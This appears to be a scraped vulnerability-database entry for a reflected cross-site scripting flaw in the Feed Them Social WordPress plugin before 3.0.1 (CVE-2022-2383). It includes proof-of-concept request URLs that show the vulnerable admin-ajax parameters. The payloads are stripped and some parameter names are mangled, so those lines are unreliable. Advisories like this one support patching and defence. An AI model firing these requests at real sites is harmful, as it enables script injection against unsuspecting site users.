Lucene search
Dc11WPVDB-ID:4A3B3023-E740-411C-A77C-6477B80D7531HistoryJul 26, 2022 - 12:00 a.m.
Feed Them Social < 3.0.1 - Reflected Cross-Site Scripting
2022-07-2600:00:00
dc11
wpscan.com
8
0.001 Low
EPSS
Percentile
43.6%
The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting
PoC
Both can be used against authenticated and unauthenticated users https://example.com/wp-admin/admin-ajax.php?action=fts_refresh_token_ajax&access;_token=![]() https://example.com/wp-admin/admin-ajax.php?action=fts_refresh_token_ajax&feed;=instagram&expires;_in=![]()
| CPE | Name | Operator | Version |
|---|---|---|---|
| feed-them-social | lt | 3.0.1 |
Related
osv
osv
CVE-2022-2383
2022-08-22 15:15:14
wpexploit
wpexploit
Feed Them Social < 3.0.1 - Reflected Cross-Site Scripting
2022-07-26 00:00:00
patchstack
patchstack
nuclei
nuclei
WordPress Feed Them Social <3.0.1 - Cross-Site Scripting
2022-08-25 15:48:37
cvelist
cvelist
CVE-2022-2383 Feed Them Social < 3.0.1 - Reflected Cross-Site Scripting
2022-08-22 15:02:27
cve
cve
CVE-2022-2383
2022-08-22 15:15:14
prion
prion
Cross site scripting
2022-08-22 15:15:00
nvd
nvd
CVE-2022-2383
2022-08-22 15:15:14